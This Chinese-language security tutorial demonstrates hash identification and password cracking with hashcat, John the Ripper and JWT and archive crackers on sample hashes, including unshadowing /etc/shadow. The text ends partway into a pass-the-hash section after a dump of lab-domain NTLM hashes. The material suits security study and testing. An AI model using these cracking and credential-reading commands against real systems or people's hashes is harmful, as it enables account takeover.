Hash Cracking 技术
iker 发表于 北京 历史精选 1614浏览 · 2024-11-05 02:50

Hash Cracking 技术

前置知识

首先,提出问题:

  • Hash 是否是一种加密技术,是否可逆?
  • /etc/shadow 中 $1$6 开头的 Hash 有什么不同?
  • 除了 MD5 外,还有哪些 Hash 算法?
  • Nacos 如何加密用户密码,是否可破解?
  • Kerberos 认证各阶段中 Hash 算法是如何工作的?
  • AS-REP Roasting 和 Kerberoasting 分别发生在 Kerberos 哪个阶段?
  • 如何通过 Hash Crack 技术从一段域内流量中获取凭证?
  • ...

本文目标:

  • 15 种常见 Hash 及其破解
  • 3 种域内 Hash 及其破解
  • NTLM 认证中的攻击流量分析、Hash 组装及破解
  • Kerberos 认证中的攻击流量分析、Hash 组装及破解

目录如下:

  • 识别 Hash 算法- Hash Identify
  • 常见 Hash 破解 - Hash Cracking with X
    • 基本结构 - Hash Format
    • 生成及破解 - Generate and Cracking
      • md5 - (no prefix)
      • traditional des - (no prefix)
      • md5crypt - $1
      • bcrypt - $2a / $2b
      • sha512crypt - $6
      • yescrypt - $y
      • LM
      • NTLM
      • NetNTLMv1
      • NetNTLMv2
      • JWT(JSON Web Token)
      • PKZIP - $pkzip2
      • WinZip - $zip2
      • 7-Zip - $7z
      • RAR5 - $rar5
    • 攻击流量分析 - Traffic Analysis
      • NTLM - Pass the Hash 哈希传递
      • NetNTLMv2 - Responder 中继攻击
  • Kerberos Hash 破解 - Hash Cracking with Kerberos
    • Kerberos 配置 - Infrastructure
      • Kerberos 环境搭建
      • Kerberos 认证流程
      • 配置 AS-REP Roasting 前置条件
      • 配置 Kerberoasting 前置条件
    • 基本结构 - Hash Format
    • 示例及破解 - Examples and Cracking
      • Kerberos AS-REQ Pre-Auth - $krb5pa
      • Kerberos AS-REP - $krb5asrep
      • Kerberos TGS-REP - $krb5tgs
    • 攻击流量分析 - Traffic Analysis
      • Kerberos AS-REQ Pre-Auth - $krb5pa
      • Kerberos AS-REP - $krb5asrep
      • Kerberos TGS-REP - $krb5tgs

在阅读第一部分 常见 Hash 破解 - Hash Cracking with X 前,需要掌握以下前置知识:

  • Hashcat 或 John the ripper 的基本使用
  • NTLM 认证流程
  • Responder 中继原理

在阅读第二部分 Kerberos Hash 破解 - Hash Cracking with Kerberos 前,需要掌握以下前置知识:

  • Hashcat 或 John the ripper 的基本使用
  • Kerberos 认证流程
  • AS-REP Roasting 前置条件及利用
  • Kerberoasting 前置条件及利用

识别 Hash 算法 - Hash Identify

kali 自带工具:

# (kali) hash-identifier
hash-identifier
> 5f4dcc3b5aa765d61d8327deb882cf99

# (kali) hashid
hashid 698d51a19d8a121ce581499d7b701668

其他开源工具:

# https://github.com/HashPals/Name-That-Hash
# [INSTALL] pip install name-that-hash
nth --text '5f4dcc3b5aa765d61d8327deb882cf99'

# https://github.com/noraj/haiti
# [INSTALL] gem install haiti-hash
haiti 698d51a19d8a121ce581499d7b701668

常见 Hash 破解 - Hash Cracking with X

基本结构 - Hash Format

一些常见的 Hash 算法及结构示例:

# Sample password hash encoding strings
DES has no prefix
$1: md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)
$2: bcrypt $2*$, Blowfish (Unix)
$2a: bcrypt(md5($pass)) / bcryptmd5
$2b: bcrypt(sha256($pass)) / bcryptsha256
$sha1: Juniper/NetBSD sha1crypt
$5: sha256crypt $5$, SHA256 (Unix)
$6: sha512crypt $6$, SHA512 (Unix)
$y: yescrypt (debian)
$apr1: Apache $apr1$ MD5, md5apr1, MD5 (APR)
-----
eyj: JWT (JSON Web Token)
-----
$pkzip2: PKZIP
$zip2: WinZip   
$7z: 7-Zip
$RAR3: RAR3-hp
$rar5: RAR5

Hashcat 可破解的格式示例:

# https://hashcat.net/wiki/doku.php?id=example_hashes
# The password for all example hashes is hashcat.
# [DES crypt] hashcat
48c/R8JAv757A
# [MD5] hashcat
8743b52063cd84097a65d1633f5c74f5
# [MD5 crypt] hashcat
$1$28772684$iEwNOgGugqO9.bIz5sk8k/
# [bcrypt] hashcat
$2a$05$LhayLxezLhK1LhWvKxCyLOj0j1u.Kj0jZ0pEmm134uzrQlFvQJLF6
# [SHA-1 crypt] hashcat
b89eaac7e61417341b710b727768294d0e6a277b
# [SHA-256 crypt] hashcat
$5$rounds=5000$GX7BopJZJxPc/KEK$le16UF8I2Anb.rOrn22AUPWvzUETDGefUmAV8AZkGcD
# [SHA-512 crypt] hashcat
$6$52450745$k5ka2p8bFuSmoVT1tzOyyuaREkkKBcCNqoDKzYiJL9RaE8yMnPgh2XzzF0NDrUhgrcLwg78xs1w5pJiypEdFX/
# [Apache $apr1$ MD5]
$apr1$71850310$gh9m4xcAn3MGxogwX/ztb.
# [LM] hashcat (password length <= 7)
299bd128c1101fd6
299BD128C1101FD6AAD3B435B51404EE
# [NTLM] hashcat
b4b9b02e6f09a9bd760f388b67351e2b
# [Net-NTLMv1] hashcat
# username::hostname:LM response:NTLM response:challenge
u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c
# [NetNTLMv2] hashcat
# username::domain:challenge:HMAC-MD5:blob
admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030
# [JWT] hashcat
eyJhbGciOiJIUzI1NiJ9.eyIzNDM2MzQyMCI6NTc2ODc1NDd9.f1nXZ3V_Hrr6ee-AFCTLaHRnrkiKmio2t3JqwL32guY
# [PKZIP]
ez_sign.zip:$pkzip2$3*1*1*0*8*24*6f5f*8c57*96efce3ba8f42df5100275b25b34189c24506195b837da194a398d37debe7c6fa32dce9a*1*0*8*24*97cf*716c*6e1f48559e23d1efab2d8d181d788dbe0466eb53ae2a4dea03b6582a49defcee8b9a644f*2*0*6a*9b*224ac2c9*59665*2f*8*6a*224a*86eb*cac9ee9362cc24b1f6f29b67f073f86ea4457b208ef8843c5205d31792505c15b30c7031b7fa7c0e355067a0e5757b4976cd8584eff13c42156377ccdb92d7fb7438d562d48ffd97173d888a610a00d48bc4e2a7664b3c3b79c104e1f10430fdf2ead69cf7983dbb6c65*$/pkzip2$::ez_sign.zip:ez_sign/part3.zip, ez_sign/part2.pcapng, ez_sign/part1.jpg:ez_sign.zip
# [WinZip]
$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$
# [7-Zip]
$7z$2$19$0$$16$efaf9d6baa7904b3b036e662682ab20b$179887464$160$153$dd4c47f4760d13ba9c787f5164359c4364e5521a5827540667d3fc77275b6aaebebd3e830534fdd04a56d50381117dfb83ed5d33258aca9aefa2466e62b566341f3b836902162b344ea186904a5ce2cbbb82bf46d697498f2ebd9350a77e311756323c8d8984522e78cf7edcb1384bdd51f080819718ca20c948cd980aec5a85777e457099ede588c82b1778a3a145eb7ae4ddd6034b7f197cea34b8d29f6b8f$155$00
# [RAR5]
$rar5$16$eba9202c2dde739ad93698c92884a65a$15$5486d4941a022f8f847b23421ff5f006$8$2a736b197dcada46

John the ripper 可破解的格式示例:

# https://openwall.info/wiki/john/sample-hashes
# or command: john --list=format-details
# [DES crypt] password 
rEK1ecacw.7.c
# [BSDI crypt] password
_J9..K0AyUubDrfOgO4s
# [bigcrypt] passphrase
qiyh4XPJGsOZ2MEAyLkfWqeQ
# [crypt16] passphrase
qi8H8R7OM4xMUNMPuRAZxlY.
# [MD5 crypt] password
$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/
# [SHA-256 crypt] password
$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5
$5$rounds=5000$usesomesillystri$KqJWpanXZHKq2BOB43TSaYhEWsQ1Lr5QNyPCDH/Tp.6
# [SHA-512 crypt] password
$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1
$6$rounds=5000$usesomesillystri$D4IrlXatmP7rx3P3InaxBeoomnAihCKRVQP22JZ6EY47Wc6BkroIuUUBOov1i.S5KPgErtP/EN5mcO.ChWQW21 
# [bcrypt] password
$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe    
# [LM] passphrase
# Default on: Windows NT, 2000, XP; Mac OS X 10.3
# Also supported on: Windows Vista, 7; Samba
855c3697d9979e78ac404c4ba2c66533        
# [NTLM] passphrase
# Windows NT, 2000, XP, Vista, 7; Samba
$NT$7f8fe03093cc84b267b109625f6bbf4b

# Others
# [yescrypt] password
$y$j9T$RCrZ03NIvNEhIXXHAK1P51$4SMUXZVAELCH8PYvw92vVMXqQAo6.vKffKzFIP9ayz2

生成及破解 - Generate and Cracking

md5 - (no prefix)

# Calculate a MD5 hash from a string
# Linux
echo -n <string> | md5sum
echo -n <string> | openssl md5

# Calculate a MD5 hash from a file
# Windows powershell
PS C:\> Get-FileHash file.txt -Algorithm md5
# Windows git bash
$ md5sum file.txt
# Windows certutil
C:\> certutil -hashfile <filename> md5
# Linux
md5sum <filename>

# Crack with Hashcat
echo 21232f297a57a5a743894a0e4a801fc3 > hashes.txt
hashcat --force -a 0 -m 0 hashes.txt -o result.txt /opt/metasploit-framework/embedded/framework/data/wordlists/default_pass_for_services_unhashes.txt

# Crack with John the ripper
john --format=raw-md5 hashes.txt
john --format=raw-md5 hashes.txt --show
?:admin

traditional des - (no prefix)

# [DES crypt] password
..UZoIyj/Hy/c

# Generate with perl
perl -le 'print crypt("password", "salt")'
sa3tHJ3/KuYvI
-----
perl -le 'print crypt("password", "")'
..UZoIyj/Hy/c

# Crack with Hashcat
echo -n 'sa3tHJ3/KuYvI' > hashes.txt
-----
hashcat -m 1500 -a 0 -o result.txt hashes.txt ~/HackTools/Dict/password_10w.txt --force
-----
cat result.txt
sa3tHJ3/KuYvI:password

# Crack with John the ripper
john --wordlist=~/HackTools/Dict/password_10w.txt hashes.txt
-----
john --show hashes.txt
?:password

md5crypt - $1

# Hash Format for md5crypt 
$1$[salt]$[hash]
# [MD5 crypt] hashcat
$1$28772684$iEwNOgGugqO9.bIz5sk8k/
# [MD5 crypt] password
$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/

# Generate with openssl
openssl passwd -1 123456
$1$ca4bbVqc$nh/Nb7Fs/.M7EXI1zywPH.
-----
openssl passwd -1 wh0am!   
$1$xjLfSILk$k.XlGRrzUkO6/HVxeLZ7O1

# Crack with Hashcat
echo -n '$1$ca4bbVqc$nh/Nb7Fs/.M7EXI1zywPH.' > hashes.txt
-----
hashcat -m 500 -a 0 -o result.txt hashes.txt ~/HackTools/Dict/password_10w.txt --force
-----
cat result.txt
$1$ca4bbVqc$nh/Nb7Fs/.M7EXI1zywPH.:123456

# Crack with John the ripper,type: md5crypt
john --wordlist=~/HackTools/Dict/password_10w.txt hashes.txt
-----
john --show hashes.txt
?:123456

bcrypt - $2a / $2b

# Hash Format for bcrypt
$2b$[cost]$[22 character salt][31 character hash]
# for example:
$2a$10$N9qo8uLOickgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWy 
\__/\/ \____________________/\_____________________________/ 
alg cost         salt                   hash
# $2a vs $2b
$2a: bcrypt(md5($pass)) / bcryptmd5
$2b: bcrypt(sha256($pass)) / bcryptsha256

# [bcrypt] password
$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe

# Generate with python
-----
# pip install bcrypt
import bcrypt
# Declaring our password
password = b'123456'
# Adding the salt to password
salt = bcrypt.gensalt()
# Hashing the password
hashed = bcrypt.hashpw(password, salt)
# printing the salt
print("Salt :")
print(salt)
# printing the hashed
print("Hashed")
print(hashed)
'''
Salt :
b'$2b$12$o5UtOmL9ZnN7X0kDJo57o.'
Hashed
b'$2b$12$o5UtOmL9ZnN7X0kDJo57o.p1oOSld18QmKSJ7SS9WoFG6fGKFI3oa'
'''
-----

# Crack with Hashcat
echo -n '$2b$12$o5UtOmL9ZnN7X0kDJo57o.p1oOSld18QmKSJ7SS9WoFG6fGKFI3oa' > hashes.txt
-----
hashcat -m 3200 -a 0 -o result.txt hashes.txt ~/HackTools/Dict/password_10w.txt --force
-----
cat result.txt
$2b$12$o5UtOmL9ZnN7X0kDJo57o.p1oOSld18QmKSJ7SS9WoFG6fGKFI3oa:123456

# Crack with John the ripper,type: bcrypt
john --wordlist=~/HackTools/Dict/password_10w.txt hashes.txt
-----
john --show hashes.txt
?:123456

sha512crypt - $6

# Hash Format for sha512crypt
$6$[salt][hash]
# for example, in /etc/shadow:
# root/123456
root:$6$PCjFvrAA/NnyKdMp$7fs0mn0nUuQ0jjtKZVAyf8TCBIx5MUvwC2ftkRwh2q7PYSuKpnv4wVu63zX.oCJ/RG2v4gDbNMCDAV1dIjCuE.:18631:0:::::
# [salt] PCjFvrAA/NnyKdMp
# [encrypt password] 7fs0mn0nUuQ0jjtKZVAyf8TCBIx5MUvwC2ftkRwh2q7PYSuKpnv4wVu63zX.oCJ/RG2v4gDbNMCDAV1dIjCuE.

# [SHA-512 crypt] password
$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1 
# [SHA-512 crypt] 123456
$6$1$j.74UuJkzzPKyD/cMaD1PygML3gwSnec87gsickCF6sO5D8UuHzTbK0DtUbI1257QK03GEHXpdFFmjPewVtaI0

# Generate with openssl
openssl passwd -6 -salt $(openssl rand -base64 12) "123456"
$6$1UgW2MWWR+0rK5Zp$NIRQzRzUBgzPpf5rdikXHkw7Bu8JQa2xTuGkhBorqrRhbAwUKC2m9IecFqXMO5tQJhB/fWfmQ6TPYoxHzuP3r1

# Crack with Hashcat
cat hashes.txt
$6$1$j.74UuJkzzPKyD/cMaD1PygML3gwSnec87gsickCF6sO5D8UuHzTbK0DtUbI1257QK03GEHXpdFFmjPewVtaI0
-----
hashcat -m 1800 -a 0 -o result.txt hashes.txt ~/HackTools/Dict/password_10w.txt --force
-----
cat result.txt
$6$1$j.74UuJkzzPKyD/cMaD1PygML3gwSnec87gsickCF6sO5D8UuHzTbK0DtUbI1257QK03GEHXpdFFmjPewVtaI0:123456

# Crack with John the ripper,type:sha512crypt
john --wordlist=~/HackTools/Dict/password_10w.txt hashes.txt
-----
john --show hashes.txt
?:123456

yescrypt - $y

# [yescrypt] password
$y$j9T$RCrZ03NIvNEhIXXHAK1P51$4SMUXZVAELCH8PYvw92vVMXqQAo6.vKffKzFIP9ayz2

# Crack with John the ripper
unshadow /etc/passwd /etc/shadow > unshadowed.txt
-----
cat unshadowed.txt
-----
root:$y$j9T$8wKCupG0/Pt7hVej1wsWz.$zzxCMDnyulKdgTaE0kkwvLMKi2CsjYIqGoG8j7boki0:0:0:root:/root:/usr/bin/zsh
...
kali:$y$j9T$35R2okXivtPCejiMOlWmv.$FrJeZy0Gb.XtZC.Qarb4ecGhrjc7aZ.hQGSCKXgVMR9:1000:1000:kali,,,:/home/kali:/usr/bin/zsh
# if yescrypt, use --format=crypt
# root:root
# kali:kali
john --format=crypt --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
-----
john unshadowed.txt --show
root:root:0:0:root:/root:/usr/bin/zsh
kali:kali:1000:1000:kali,,,:/home/kali:/usr/bin/zsh

LM

# [LM] hashcat (password length <= 7)
299bd128c1101fd6
299BD128C1101FD6AAD3B435B51404EE
# [LM] passphrase
# Default on: Windows NT, 2000, XP; Mac OS X 10.3
# Also supported on: Windows Vista, 7; Samba
855c3697d9979e78ac404c4ba2c66533

# Crack with Hashcat -a 0 for dictionary
hashcat -a 0 -m 3000 --force '299BD128C1101FD6AAD3B435B51404EE'  password_10w.txt --show
299bd128c1101fd6aad3b435b51404ee:HASHCAT
# Crack with Hashcat -a 3 for bruteforce
hashcat -a 3 -m 3000 'F0D412BD764FFE81AAD3B435B51404EE' '?l?l?l?l?l' --show
f0d412bd764ffe81aad3b435b51404ee:ADMIN

# Crack with John the ripper
john --format=lm hashes.txt --show
?:PASSPHRASE

NTLM

# [NTLM] passphrase
# Windows NT, 2000, XP, Vista, 7; Samba
$NT$7f8fe03093cc84b267b109625f6bbf4b

# Generate online
https://codebeautify.org/ntlm-hash-generator
https://github.com/gchq/CyberChef
# Generate with python
from passlib.hash import nthash
password = "password"
ntlm_hash = nthash.hash(password)
print(f"NTLM hash for '{password}' is: {ntlm_hash}")
-----
NTLM hash for 'password' is: 8846f7eaee8fb117ad06bdd830b7586c

# Crack with Hashcat
echo -n '8846f7eaee8fb117ad06bdd830b7586c' > hashes.txt
-----
hashcat -m 1000 -a 3 -o result.txt hashes.txt --force
# or
hashcat -m 1000 -a 0 -o result.txt hashes.txt ~/HackTools/Dict/password_10w.txt --force
-----
cat result.txt
8846f7eaee8fb117ad06bdd830b7586c:password

# Crack with John the ripper
john --wordlist=~/HackTools/Dict/password_10w.txt --format=NT hashes.txt
-----
john --show --format=NT hashes.txt
?:password

NetNTLMv1

# Hashcat NetNTLMv1 / NetNTLMv1+ESS
# username::hostname:LM response:NTLM response:challenge
u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c
# John the ripper NetNTLMv1 – NTLMv1 C/R MD4 DES [ESS MD5]
$NETNTLM$1122334455667788$B2B2220790F40C88BCFF347C652F67A7C4A70D3BEBD70233
username:$NETNTLM$1122334455667788$B2B2220790F40C88BCFF347C652F67A7C4A70D3BEBD70233
username:$NETNTLM$1122334455667788$B2B2220790F40C88BCFF347C652F67A7C4A70D3BEBD70233:::::::

# Crack online
https://crack.sh/

# Crack with Hashcat
hashcat -m 5500 -a 0 hashes.txt password_10w.txt --show
u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c:hashcat

# Crack with John the ripper
john --format=netntlm hashes.txt --show
?:cory21

NetNTLMv2

# Hashcat NetNTLMv2
# username::domain:challenge:HMAC-MD5:blob
admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030
# John the ripper NetNTLMv2 – NTLMv2 C/R MD4 HMAC-MD5
$NETNTLMv2$NTLMV2TESTWORKGROUP$1122334455667788$07659A550D5E9D02996DFD95C87EC1D5$0101000000000000006CF6385B74CA01B3610B02D99732DD000000000200120057004F0052004B00470052004F00550050000100200044004100540041002E00420049004E0043002D0053004500430055005200490000000000
username:$NETNTLMv2$NTLMV2TESTWORKGROUP$1122334455667788$07659A550D5E9D02996DFD95C87EC1D5$0101000000000000006CF6385B74CA01B3610B02D99732DD000000000200120057004F0052004B00470052004F00550050000100200044004100540041002E00420049004E0043002D0053004500430055005200490000000000
username:$NETNTLMv2$NTLMV2TESTWORKGROUP$1122334455667788$07659A550D5E9D02996DFD95C87EC1D5$0101000000000000006CF6385B74CA01B3610B02D99732DD000000000200120057004F0052004B00470052004F00550050000100200044004100540041002E00420049004E0043002D0053004500430055005200490000000000:::::::

# Crack with Hashcat
hashcat -m 5600 -a 0 hashes.txt password_10w.txt --show
ADMIN::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030:hashcat

# Crack with John the ripper
john --format=netntlmv2 hashes.txt --show
?:password

JWT (JSON Web Token)

# Recommend Dict
~/HackTools/Dict/jwt.secrets.list

# JWT Format
# Header.Payload.Signature, eg:
# eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.kXSdJhhUKTJemgs8O0rfIJmUaxoSIDdClL_OPmaC7Eo

# Crack with Hashcat
hashcat -m 16500 -a 0 jwt.txt ~/HackTools/Dict/rockyou.txt --show
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.kXSdJhhUKTJemgs8O0rfIJmUaxoSIDdClL_OPmaC7Eo:password

# Crack with John the ripper
john jwt.txt --wordlist=~/HackTools/Dict/rockyou.txt --format=HMAC-SHA256
john jwt.txt --show
?:password

# https://github.com/Sjord/jwtcrack
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc ~/HackTools/Dict/rockyou.txt
-----
Cracking JWT eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc
0it [00:00, ?it/s]
Found secret key: 123456

# https://github.com/ticarpi/jwt_tool
python jwt_tool.py -d ~/HackTools/Dict/rockyou.txt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 
-----
=====================
Decoded Token Values:
=====================

Token header values:
[+] typ = "JWT"
[+] alg = "HS256"

Token payload values:
[+] data = "{"username":"admin","role":"admin"}"

----------------------
JWT common timestamps:
iat = IssuedAt
exp = Expires
nbf = NotBefore
----------------------

# https://github.com/brendan-rius/c-jwt-cracker
./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.cAOIAifu3fykvhkHpbuhbvtH807-Z2rI1FS3vX1XMjE
Secret is "Sn1f"

# https://github.com/mazen160/jwt-pwn
python jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w ~/HackTools/Dict/rockyou.txt
-----
[info] Loaded wordlist.
[info] starting brute-forcing.
[#] KEY FOUND: 123456
-----
python jwt-decoder.py "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqd3QiOiJwd24ifQ.4pOAm1W4SHUoOgSrc8D-J1YqLEv9ypAApz27nfYP5L4"
# Generates a new JWT that is signed with HS256 with the same payload value of a provided JWT.
python jwt-any-to-hs256.py "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqd3QiOiJwd24ifQ.4pOAm1W4SHUoOgSrc
8D-J1YqLEv9ypAApz27nfYP5L4"
# Generates a new unsigned JWT with the same payload value of a provided JWT.
python jwt-mimicker.py "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqd3QiOiJwd24ifQ.4pOAm1W4SHUoOgSrc8D-J
1YqLEv9ypAApz27nfYP5L4"


# https://github.com/lmammino/jwt-cracker
# npm install --global jwt-cracker
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz"

PKZIP - $pkzip2

# (ubuntu) sudo apt-get install fcrackzip 
# (mac) brew install fcrackzip
fcrackzip -u -D -p ~/HackTools/Dict/rockyou.txt ez_sign.zip
-----
PASSWORD FOUND!!!!: pw == 123456

# Crack with John the ripper - zip2john
zip2john ez_sign.zip > zip.john
-----
cat zip.john
ez_sign.zip:$pkzip2$3*1*1*0*8*24*6f5f*8c57*96efce3ba8f42df5100275b25b34189c24506195b837da194a398d37debe7c6fa32dce9a*1*0*8*24*97cf*716c*6e1f48559e23d1efab2d8d181d788dbe0466eb53ae2a4dea03b6582a49defcee8b9a644f*2*0*6a*9b*224ac2c9*59665*2f*8*6a*224a*86eb*cac9ee9362cc24b1f6f29b67f073f86ea4457b208ef8843c5205d31792505c15b30c7031b7fa7c0e355067a0e5757b4976cd8584eff13c42156377ccdb92d7fb7438d562d48ffd97173d888a610a00d48bc4e2a7664b3c3b79c104e1f10430fdf2ead69cf7983dbb6c65*$/pkzip2$::ez_sign.zip:ez_sign/part3.zip, ez_sign/part2.pcapng, ez_sign/part1.jpg:ez_sign.zip
-----
john zip.john --wordlist=password_10w.txt
-----
john zip.john --show
ez_sign.zip:123456::ez_sign.zip:ez_sign/part3.zip, ez_sign/part2.pcapng, ez_sign/part1.jpg:ez_sign.zip
1 password hash cracked, 0 left

WinZip - $zip2

# Crack with hashcat
hashcat -m 13600 -a 0 hashes.txt ~/HackTools/Dict/rockyou.txt --show
$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$:lovehurts

7-Zip - $7z

# Generate a .7z file, password 12345
7z a file.7z jwt.txt -t7z -p

# Crack with Hashcat
(kali) 7z2john file.7z > 7z.hash
-----
cat 7z.hash
file.7z:$7z$2$19$0$$16$efaf9d6baa7904b3b036e662682ab20b$179887464$160$153$dd4c47f4760d13ba9c787f5164359c4364e5521a5827540667d3fc77275b6aaebebd3e830534fdd04a56d50381117dfb83ed5d33258aca9aefa2466e62b566341f3b836902162b344ea186904a5ce2cbbb82bf46d697498f2ebd9350a77e311756323c8d8984522e78cf7edcb1384bdd51f080819718ca20c948cd980aec5a85777e457099ede588c82b1778a3a145eb7ae4ddd6034b7f197cea34b8d29f6b8f$155$00
-----
# file.7z:$7z$2$19$... for John the ripper
# $7z$2$19$... for Hashcat
------
hashcat -m 11600 hashes.txt ~/HackTools/Dict/rockyou.txt --show
$7z$2$19$0$$16$efaf9d6baa7904b3b036e662682ab20b$179887464$160$153$dd4c47f4760d13ba9c787f5164359c4364e5521a5827540667d3fc77275b6aaebebd3e830534fdd04a56d50381117dfb83ed5d33258aca9aefa2466e62b566341f3b836902162b344ea186904a5ce2cbbb82bf46d697498f2ebd9350a77e311756323c8d8984522e78cf7edcb1384bdd51f080819718ca20c948cd980aec5a85777e457099ede588c82b1778a3a145eb7ae4ddd6034b7f197cea34b8d29f6b8f$155$00:12345

# Crack with John the ripper
# file.7z:$7z$2$19$0$$16$efaf9d6baa7904b3b036e662682ab20b$179887464$160$153$dd4c47f4760d13ba9c787f5164359c4364e5521a5827540667d3fc77275b6aaebebd3e830534fdd04a56d50381117dfb83ed5d33258aca9aefa2466e62b566341f3b836902162b344ea186904a5ce2cbbb82bf46d697498f2ebd9350a77e311756323c8d8984522e78cf7edcb1384bdd51f080819718ca20c948cd980aec5a85777e457099ede588c82b1778a3a145eb7ae4ddd6034b7f197cea34b8d29f6b8f$155$00
john --format=7z --wordlist=~/HackTools/Dict/rockyou.txt hashes.txt
john hashes.txt --show
file.7z:12345

RAR5 - $rar5

# Generate a .rar file, password 12345
# (mac) brew install --cask rar
rar a -p12345 file.rar example.txt

# Crack with Hashcat
rar2john file.rar > rar.hash
-----
cat rar.hash
file.rar:$rar5$16$eba9202c2dde739ad93698c92884a65a$15$5486d4941a022f8f847b23421ff5f006$8$2a736b197dcada46
# only hash as input
# file.rar:$rar5$16$eba9202c2... for John the ripper
# $rar5$16$eba9202c2... for Hashcat
hashcat -m 13000 hashes.txt ~/HackTools/Dict/rockyou.txt --show
$rar5$16$eba9202c2dde739ad93698c92884a65a$15$5486d4941a022f8f847b23421ff5f006$8$2a736b197dcada46:12345

# Crack with John the ripper
# file.rar:$rar5$16$eba9202c2dde739ad93698c92884a65a$15$5486d4941a022f8f847b23421ff5f006$8$2a736b197dcada46
john --format=RAR5 --wordlist=~/HackTools/Dict/rockyou.txt hashes.txt
john hashes.txt --show
file.rar:12345

攻击流量分析 - Traffic Analysis

NTLM - Pass the Hash 哈希传递

如果你已经通过 secretsdump 等方式获取了 NTLM Hash:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:9b6527a2fa104886453b3b75bc0da9d6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8b7826266691cea4d51be740356a25d2:::
npc.com\three:1106:aad3b435b51404eeaad3b435b51404ee:465590ccb4be6340bc749c34dfc34630:::
npc.com\four:1108:aad3b435b51404eeaad3b435b51404ee:7506130ff1e526312f70f5896bc11e29:::
WIN-VAH4GJKI11G$:1000:aad3b435b51404eeaad3b435b51404ee:b8085d0250629350db7a53ac9d7fedae:::
